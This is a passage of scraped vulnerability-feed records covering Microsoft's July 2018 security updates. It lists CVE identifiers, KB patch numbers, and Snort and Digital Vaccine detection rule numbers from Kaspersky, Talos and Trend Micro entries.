\n[CVE-2018-8294](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8294>)7.5Warning \n[CVE-2018-8276](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8276>)6.5Warning \n[CVE-2018-8280](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8280>)7.5Warning \n[CVE-2018-8290](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8290>)7.5Warning \n[CVE-2018-8288](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8288>)7.5Warning \n[CVE-2018-8291](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8291>)7.5Warning \n[CVE-2018-8275](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8275>)7.5Warning \n[CVE-2018-8287](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8287>)7.5Warning \n[CVE-2018-8356](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8356>)5.5Warning \n[CVE-2018-8298](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8298>)7.5Warning \n[CVE-2018-8319](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8319>)9.8Warning \n[CVE-2018-8326](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8326>)5.4Warning \n[CVE-2018-8306](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8306>)5.5Warning \n[CVE-2018-8202](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8202>)7.8Warning \n[CVE-2018-8172](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8172>)7.8Warning \n[CVE-2018-8260](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8260>)8.8Warning \n[CVE-2018-8327](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8327>)9.8Warning \n[CVE-2018-8171](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8171>)7.5Warning \n[CVE-2018-8232](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8232>)7.8Warning \n[CVE-2018-8284](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8284>)8.1Warning \n[CVE-2018-8283](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8283>)7.5Warning\n\n### *KB list*:\n[4338825](<http://support.microsoft.com/kb/4338825>) \n[4338814](<http://support.microsoft.com/kb/4338814>) \n[4338829](<http://support.microsoft.com/kb/4338829>) \n[4338819](<http://support.microsoft.com/kb/4338819>) \n[4338826](<http://support.microsoft.com/kb/4338826>) \n[4345421](<http://support.microsoft.com/kb/4345421>) \n[4345419](<http://support.microsoft.com/kb/4345419>) \n[4345455](<http://support.microsoft.com/kb/4345455>) \n[4345420](<http://support.microsoft.com/kb/4345420>) \n[4345418](<http://support.microsoft.com/kb/4345418>) \n[4338420](<http://support.microsoft.com/kb/4338420>) \n[4338611](<http://support.microsoft.com/kb/4338611>) \n[4338604](<http://support.microsoft.com/kb/4338604>) \n[4338415](<http://support.microsoft.com/kb/4338415>) \n[4338421](<http://support.microsoft.com/kb/4338421>) \n[4338422](<http://support.microsoft.com/kb/4338422>) \n[4338416](<http://support.microsoft.com/kb/4338416>) \n[4338601](<http://support.microsoft.com/kb/4338601>) \n[4336919](<http://support.microsoft.com/kb/4336919>) \n[4338613](<http://support.microsoft.com/kb/4338613>) \n[4338418](<http://support.microsoft.com/kb/4338418>) \n[4338424](<http://support.microsoft.com/kb/4338424>) \n[4338419](<http://support.microsoft.com/kb/4338419>) \n[4338417](<http://support.microsoft.com/kb/4338417>) \n[4339279](<http://support.microsoft.com/kb/4339279>) \n[4336986](<http://support.microsoft.com/kb/4336986>) \n[4338600](<http://support.microsoft.com/kb/4338600>) \n[4338612](<http://support.microsoft.com/kb/4338612>) \n[4336999](<http://support.microsoft.com/kb/4336999>) \n[4338606](<http://support.microsoft.com/kb/4338606>) \n[4336946](<http://support.microsoft.com/kb/4336946>) \n[4338602](<http://support.microsoft.com/kb/4338602>) \n[4338605](<http://support.microsoft.com/kb/4338605>) \n[4338423](<http://support.microsoft.com/kb/4338423>) \n[4342193](<http://support.microsoft.com/kb/4342193>) \n[4338610](<http://support.microsoft.com/kb/4338610>) \n[4342192](<http://support.microsoft.com/kb/4342192>) \n[4342191](<http://support.microsoft.com/kb/4342191>) \n[4346877](<http://support.microsoft.com/kb/4346877>) \n[4344151](<http://support.microsoft.com/kb/4344151>) \n[4344146](<http://support.microsoft.com/kb/4344146>) \n[4343909](<http://support.microsoft.com/kb/4343909>) \n[4344166](<http://support.microsoft.com/kb/4344166>) \n[4344177](<http://support.microsoft.com/kb/4344177>) \n[4344178](<http://support.microsoft.com/kb/4344178>) \n[4344147](<http://support.microsoft.com/kb/4344147>) \n[4344148](<http://support.microsoft.com/kb/4344148>) \n[4343885](<http://support.microsoft.com/kb/4343885>) \n[4344172](<http://support.microsoft.com/kb/4344172>) \n[4344144](<http://support.microsoft.com/kb/4344144>) \n[4343887](<http://support.microsoft.com/kb/4343887>) \n[4344149](<http://support.microsoft.com/kb/4344149>) \n[4344175](<http://support.microsoft.com/kb/4344175>) \n[4344165](<http://support.microsoft.com/kb/4344165>) \n[4344167](<http://support.microsoft.com/kb/4344167>) \n[4343892](<http://support.microsoft.com/kb/4343892>) \n[4344153](<http://support.microsoft.com/kb/4344153>) \n[4344150](<http://support.microsoft.com/kb/4344150>) \n[4344152](<http://support.microsoft.com/kb/4344152>) \n[4344176](<http://support.microsoft.com/kb/4344176>) \n[4344171](<http://support.microsoft.com/kb/4344171>) \n[4344173](<http://support.microsoft.com/kb/4344173>) \n[4344145](<http://support.microsoft.com/kb/4344145>) \n[4343897](<http://support.microsoft.com/kb/4343897>)\n\n### *Microsoft official advisories*:", "modified": "2019-03-07T00:00:00", "published": "2018-07-10T00:00:00", "id": "KLA11288", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11288", "title": "\r KLA11288Multiple vulnerabilities in Microsoft Development Tools ", "type": "kaspersky", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "talosblog": [{"lastseen": "2018-08-03T09:00:12", "bulletinFamily": "blog", "description": "Microsoft released its monthly set of security advisories today for vulnerabilities that have been identified and addressed in various products. This month's release addresses 53 new vulnerabilities, 17 of which are rated critical, 34 are rated important, one is rated moderate, and one is rated as low severity. These vulnerabilities impact Windows Operating System, Edge, Internet Explorer and more. \n \nIn addition to the 53 vulnerabilities referenced above, Microsoft has also released a critical update advisory, [ADV180017](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV180017>), which addresses the vulnerabilities described in the Adobe security bulletin [APSB18-24](<https://helpx.adobe.com/security/products/flash-player/apsb18-24.html>). \n \n\n\n## \n\n## Critical vulnerabilities\n\n \nThis month, Microsoft is addressing 17 vulnerabilities that are rated as critical: \n \n \n[CVE-2018-8242](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8242>) \\- Scripting Engine Memory Corruption Vulnerability \n[CVE-2018-8262](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8262>) \\- Microsoft Edge Memory Corruption Vulnerability \n[CVE-2018-8274](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8274>) \\- Microsoft Edge Memory Corruption Vulnerability \n[CVE-2018-8275](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8275>) \\- Scripting Engine Memory Corruption Vulnerability \n[CVE-2018-8279](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8279>) \\- Scripting Engine Memory Corruption Vulnerability \n[CVE-2018-8280](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8280>) \\- Chakra Scripting Engine Memory Corruption Vulnerability \n[CVE-2018-8283](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8283>) \\- Scripting Engine Memory Corruption Vulnerability \n[CVE-2018-8286](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8286>) \\- Chakra Scripting Engine Memory Corruption Vulnerability \n[CVE-2018-8288](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8288>) \\- Scripting Engine Memory Corruption Vulnerability \n[CVE-2018-8290](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8290>) \\- Chakra Scripting Engine Memory Corruption Vulnerability \n[CVE-2018-8291](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8291>) \\- Scripting Engine Memory Corruption Vulnerability \n[CVE-2018-8294](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8294>) \\- Chakra Scripting Engine Memory Corruption Vulnerability \n[CVE-2018-8296](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8296>) \\- Scripting Engine Memory Corruption Vulnerability \n[CVE-2018-8298](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8298>) \\- Chakra Scripting Engine Memory Corruption Vulnerability \n[CVE-2018-8301](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8301>) \\- Microsoft Edge Memory Corruption Vulnerability \n[CVE-2018-8324](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8324>) \\- Microsoft Edge Information Disclosure Vulnerability \n[CVE-2018-8327](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8327>) \\- PowerShell Editor Services Remote Code Execution Vulnerability \n \n\n\n## Important vulnerabilities\n\n \nThis month, Microsoft is addressing 34 vulnerabilities that are rated as important. \n \n \n[CVE-2018-0949](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0949>) \\- Internet Explorer Security Feature Bypass Vulnerability \n[CVE-2018-8125](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8125>) \\- Chakra Scripting Engine Memory Corruption Vulnerability \n[CVE-2018-8171](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8171>) \\- ASP.NET Core Security Feature Bypass Vulnerability \n[CVE-2018-8172](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8172>) \\- Visual Studio Remote Code Execution Vulnerability \n[CVE-2018-8202](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8202>) \\- .NET Framework Elevation of Privilege Vulnerability \n[CVE-2018-8206](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8206>) \\- Windows FTP Server Denial of Service Vulnerability \n[CVE-2018-8222](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8222>) \\- Device Guard Code Integrity Policy Security Feature Bypass Vulnerability \n[CVE-2018-8238](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8238>) \\- Skype for Business and Lync Security Feature Bypass Vulnerability \n[CVE-2018-8260](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8260>) \\- .NET Framework Remote Code Execution Vulnerability \n[CVE-2018-8276](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8276>) \\- Scripting Engine Security Feature Bypass Vulnerability \n[CVE-2018-8278](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8278>) \\- Microsoft Edge Spoofing Vulnerability \n[CVE-2018-8281](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8281>) \\- Microsoft Office Remote Code Execution Vulnerability \n[CVE-2018-8282](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8282>) \\- Win32k Elevation of Privilege Vulnerability \n[CVE-2018-8284](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8284>) \\- .NET Framework Remote Code Injection Vulnerability \n[CVE-2018-8287](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8287>) \\- Scripting Engine Memory Corruption Vulnerability \n[CVE-2018-8289](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8289>) \\- Microsoft Edge Information Disclosure Vulnerability \n[CVE-2018-8297](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8297>) \\- Microsoft Edge Information Disclosure Vulnerability \n[CVE-2018-8299](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8299>) \\- Microsoft SharePoint Elevation of Privilege Vulnerability \n[CVE-2018-8300](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8300>) \\- Microsoft SharePoint Remote Code Execution Vulnerability \n[CVE-2018-8304](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8304>) \\- Windows DNSAPI Denial of Service Vulnerability \n[CVE-2018-8305](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8305>) \\- Windows Mail Client Information Disclosure Vulnerability \n[CVE-2018-8306](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8306>) \\- Microsoft Wireless Display Adapter Command Injection Vulnerability \n[CVE-2018-8307](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8307>) \\- WordPad Security Feature Bypass Vulnerability \n[CVE-2018-8308](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8308>) \\- Windows Kernel Elevation of Privilege Vulnerability \n[CVE-2018-8309](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8309>) \\- Windows Denial of Service Vulnerability \n[CVE-2018-8311](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8311>) \\- Remote Code Execution Vulnerability in Skype For Business and Lync \n[CVE-2018-8312](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8312>) \\- Microsoft Access Remote Code Execution Use After Free Vulnerability \n[CVE-2018-8313](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8313>) \\- Windows Elevation of Privilege Vulnerability \n[CVE-2018-8314](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8314>) \\- Windows Elevation of Privilege Vulnerability \n[CVE-2018-8319](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8319>) \\- MSR JavaScript Cryptography Library Security Feature Bypass Vulnerability \n[CVE-2018-8323](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8323>) \\- Microsoft SharePoint Elevation of Privilege Vulnerability \n[CVE-2018-8325](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8325>) \\- Microsoft Edge Information Disclosure Vulnerability \n[CVE-2018-8326](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8326>) \\- Open Source Customization for Active Directory Federation Services XSS Vulnerability \n[CVE-2018-8356](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8356>) \\- .NET Framework Security Feature Bypass Vulnerability \n \n\n\n## Coverage\n\n \n \nIn response to these vulnerability disclosures, Talos is releasing the following Snort rules that detect attempts to exploit them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Firepower customers should use the latest update to their ruleset by updating their SRU. Open Source Snort Subscriber Rule Set customers can stay up-to-date by downloading the latest rule pack available for purchase on Snort.org. \n \nSnort Rules: \n \n47111-47112 \n47109-47110 \n47102-47103 \n47091-47092 \n47113-47114 \n47107-47108 \n47100-47101 \n47098-47099 \n47096-47097 \n \n", "modified": "2018-07-10T17:40:37", "published": "2018-07-10T10:36:00", "id": "TALOSBLOG:64097F241B66E90D3723AFE8991AFAB4", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/dvxVeBIywlk/ms-tuesday.html", "type": "talosblog", "title": "Microsoft Patch Tuesday - July 2018", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "trendmicroblog": [{"lastseen": "2018-07-13T16:31:41", "bulletinFamily": "blog", "description": "\n\nEarlier this week, I wrote a [blog](<https://blog.trendmicro.com/zero-day-initiative-a-1h2018-recap/>) covering a couple of the statistics from the Zero Day Initiative\u2019s (ZDI) first half of 2018. One of the stats that I didn\u2019t cover is the increasing focus on enterprise applications. The team is seeing consistent growth in submissions of Microsoft and Apple vulnerabilities, but now they\u2019re also seeing an increase of submissions in virtualization software vulnerabilities from the likes of VMware and Oracle. With a 33% increase in published advisories compared to 2017, the ZDI has their hands full. With more than 500 new researchers registering to participate in the program this year, the internal ZDI team is growing as well to accommodate this growth. 2018 may just be the biggest year yet for ZDI!\n\nIn case you missed it, you can read Brian Gorenc\u2019s [blog](<https://www.thezdi.com/blog/2018/7/9/checking-in-a-look-back-at-the-first-half-of-2018>) covering the detailed stats from the ZDI\u2019s first half of 2018.\n\n**Microsoft Security Updates**\n\nThis week\u2019s Digital Vaccine\u00ae (DV) package includes coverage for Microsoft updates released on or before July 10, 2018. It was another big month for Microsoft with 53 security patches covering both browsers (Internet Explorer, Edge), ChakraCore, Windows, .NET Framework, ASP.NET, PowerShell, Visual Studio, and Microsoft Office and Office Services. Of these 53 CVEs, 18 are listed as Critical, 33 are rated Important, one is rated as Moderate, and one is rated as Low in severity.\n\nFive CVEs in this month\u2019s Microsoft update came through the Zero Day Initiative:\n\n| \n\n * [CVE-2018-8242](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8242>)\n * [CVE-2018-8274](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8274>)\n * [CVE-2018-8275](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8275>)\n * [CVE-2018-8282](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8282>)\n * [CVE-2018-8307](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8307>) \n---|--- \n| \n \nThe following table maps Digital Vaccine filters to Microsoft\u2019s updates. You can get more detailed information on this month\u2019s security updates from Dustin Childs\u2019 [July 2018 Security Update Review](<https://www.zerodayinitiative.com/blog/2018/7/10/the-july-2018-security-update-review>) from the Zero Day Initiative:\n\n**CVE #** | **Digital Vaccine Filter #** | **Status** \n---|---|--- \nCVE-2018-0949 | 32494 | \nCVE-2018-8125 | 32486 | \nCVE-2018-8171 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8172 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8202 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8206 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8222 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8232 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8238 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8242 | 32487 | \nCVE-2018-8260 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8262 | 32491 | \nCVE-2018-8274 | 32492 | \nCVE-2018-8275 | 32493 | \nCVE-2018-8276 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8278 | 32358 | \nCVE-2018-8279 | 32359 | \nCVE-2018-8280 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8281 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8282 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8283 | 32361 | \nCVE-2018-8284 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8286 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8287 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8288 | 32488 | \nCVE-2018-8289 | 32490 | \nCVE-2018-8290 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8291 | 32360 | \nCVE-2018-8294 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8296 | 32478 | \nCVE-2018-8297 | 32551 | \nCVE-2018-8298 | 32479 | \nCVE-2018-8299 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8300 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8301 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8304 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8305 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8306 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8307 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8308 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8309 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8310 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8311 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8312 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8313 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8314 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8319 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8323 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8324 | 32558 | \nCVE-2018-8325 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8326 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8327 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8356 | | Vendor Deemed Reproducibility or Exploitation Unlikely \n \n \n\n**Zero-Day Filters**\n\nThere is one new zero-day filter covering one vendor in this week\u2019s Digital Vaccine (DV) package. A number of existing filters in this week\u2019s DV package were modified to update the filter description, update specific filter deployment recommendation, increase filter accuracy and/or optimize performance. You can browse the list of [published advisories](<http://www.zerodayinitiative.com/advisories/published/>) and [upcoming advisories](<http://www.zerodayinitiative.com/advisories/upcoming/>) on the [Zero Day Initiative](<http://www.zerodayinitiative.com/>) website. You can also follow the Zero Day Initiative on Twitter [@thezdi](<https://twitter.com/thezdi>) and on their [blog](<https://www.zerodayinitiative.com/blog>).\n\n**_Advantech (1)_**\n\n| \n\n * 32341: RPC: Advantech Webaccess webvrpcs Directory Traversal Vulnerability (ZDI-18-024) \n---|--- \n| \n \n**Missed Last Week\u2019s News?**\n\nCatch up on last week\u2019s news in my [weekly recap](<https://blog.trendmicro.com/zero-day-coverage-update-week-of-july-2-2018/>).\n\nThe post [Zero-Day Coverage Update \u2013 Week of July 9, 2018](<https://blog.trendmicro.com/zero-day-coverage-update-week-of-july-9-2018/>) appeared first on [](<https://blog.trendmicro.com>).", "modified": "2018-07-13T14:10:20", "published": "2018-07-13T14:10:20", "id": "TRENDMICROBLOG:D2DE4A375F3757187EBBB5A3EA061E42", "href": "https://blog.trendmicro.com/zero-day-coverage-update-week-of-july-9-2018/", "type": "trendmicroblog", "title": "Zero-Day Coverage Update \u2013 Week of July 9, 2018", "cvss": {"score": 0.0, "vector": "NONE"}}]}
